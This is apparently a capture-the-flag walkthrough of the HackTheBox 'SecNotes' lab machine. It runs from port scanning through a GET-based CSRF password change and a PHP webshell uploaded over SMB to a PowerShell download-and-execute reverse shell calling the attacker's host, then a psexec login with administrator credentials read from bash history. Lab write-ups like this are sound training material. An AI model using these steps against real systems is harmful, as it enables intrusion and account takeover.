SecNotes
Last updated
Was this helpful?
Last updated
Was this helpful?
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.97 -oN allPorts
-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5 insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allports file.
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p80,445,8808 10.10.10.97 -oN targeted
-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oN save the scan result into file, in this case the targeted file.
If we take a look at the website, we'll see a login panel in which we can sign up.
Let's create a new user named alfa8sa with the password alfa8sa.
Then, log in with the new user.
We'll see four options. We can create a new note, change our password, sign out, or contact the website owners. Not only that, but we can also see a message showing the tyler@secnotes.htb user.
Let's try to change our password to alfa9sa.
Before hitting submit, let's set up BurpSuite, and intercept the request.
Let's try to change the request type method from POST to GET.
If the website still changes the password, we could try to send this URL to the tyler user, and if he accesses it, his password will be changed to alfa9sa. Let's forward the request and see if it changes our password.
And we see that the password has been changed. Now we could try to send the following URL to tyler, so if he accesses it, his password will change to alfa9sa.
http://passage.htb/change_pass.php?password=alfa9sa&confirm_password=alfa9sa&submit=submit
Let's press on the Contact Us button, and send the URL.
Now, let's sign out, and try to log is as the user tyler with the password alfa9sa.
And we should be able to log in.
There are three notes. The one called New Site contains a share name and some credentials.
Let's try to access it.
smbclient -U 'tyler%92g!mA8BGjOirkL%OG*&' //secnotes.htb/new-site
-U username and password separated by "%".
There are two files, which seem to be from an IIS website. We saw on the nmap scan, that there was another web server on port 8808.
We could try to upload a webshell to the share which contains the IIS file, and then access the webshell from the browser. First, create a new file called webshell.php with the following content.
And then upload it to the Samba share.
smb: > put webshell.php
Then, we could execute commands by putting them on the cmd parameter from the following URL.
http://10.10.10.97:8808/webshell.php?cmd=whoami
cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 rev.ps1
Then, open it and paste the following line at the end of the file.
Now, set an HTTP server on the current directory with python.
python -m http.server 80
Finally, let's set a netcat listener on port 4444.
rlwrap nc -lvnp 4444
-l listen mode.
-v verbose mode.
-n numeric-only IP, no DNS resolution.
-p specify the port to listen on.
If now we access the following URL, the machine will download the Invoke-PowerShellTcp.ps1 file from our machine, and then it will send us a reverse shell as the tyler user. Then we could grab the user flag.
http://10.10.10.97:8808/webshell.php?cmd=powershell "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.7/Invoke-PowerShellTcp.ps1')"
If we take a look at the desktop of the user tyler, we'll see a link file named bash.lnk. Which means that bash is probably installed in the system.
dir \users\tyler\desktop
If we execute the whoami command with bash we'll see that we are the root user.
bash -c "whoami"
Let's see if the root flag is inside the /root directory.
bash -c "ls -la /root"
There is no flag, but we see the .bash_history file with some content. Let's see what's in it.
bash -c "cat /root/.bash_history"
We get the administrator credentials. Let's get a shell as the nt authority\system user on the machine with psexec utility from impacket. Then, all we have to do is reap the harvest and take the root flag.
impacket-psexec administrator:'u6!4ZwgwOM#^OBf#Nwnh'@10.10.10.97
Time to get a reverse shell. First, we'll have to copy the Invoke-PowerShellTcp.ps1 file from to our current directory.
